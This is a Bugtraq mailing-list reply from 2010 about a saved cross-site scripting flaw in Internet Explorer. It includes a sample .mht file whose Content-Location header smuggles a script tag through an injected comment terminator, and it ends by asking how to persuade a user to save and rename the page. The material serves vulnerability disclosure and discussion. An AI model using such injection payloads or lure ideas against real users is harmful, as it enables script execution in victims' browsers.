Bugtraq mailing list archives
Re: Saved XSS vulnerability in Internet Explorer
From: ecco <eccocce () gmail com>
Date: Tue, 16 Nov 2010 12:55:39 +0100
Hi there, It works because there is "Content-Location" header in .mht file so our malicious code will be there. "Content-Location" is outside <html></html> so it will work only in IE (with .htm extension ofcourse). Example code of .mht file with XSS: [...] Content-Type: text/html; charset="utf-8" Content-Transfer-Encoding: quoted-printable Content-Location: http://localhost/test/index.php?--><script>alert("XSS")</script> =EF=BB=BF<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <HTML = xmlns=3D"http://www.w3.org/1999/xhtml"> [...] </HTML> Question is: How to convince user to sava our page on his hdd and change extension to .html? Regards
Current thread:
- Saved XSS vulnerability in Internet Explorer MustLive (Nov 15)
- RE: Saved XSS vulnerability in Internet Explorer Hans Wolters (Nov 19)
- Re: Saved XSS vulnerability in Internet Explorer MustLive (Nov 19)
- <Possible follow-ups>
- Re: Saved XSS vulnerability in Internet Explorer ecco (Nov 19)
- RE: Saved XSS vulnerability in Internet Explorer Hans Wolters (Nov 19)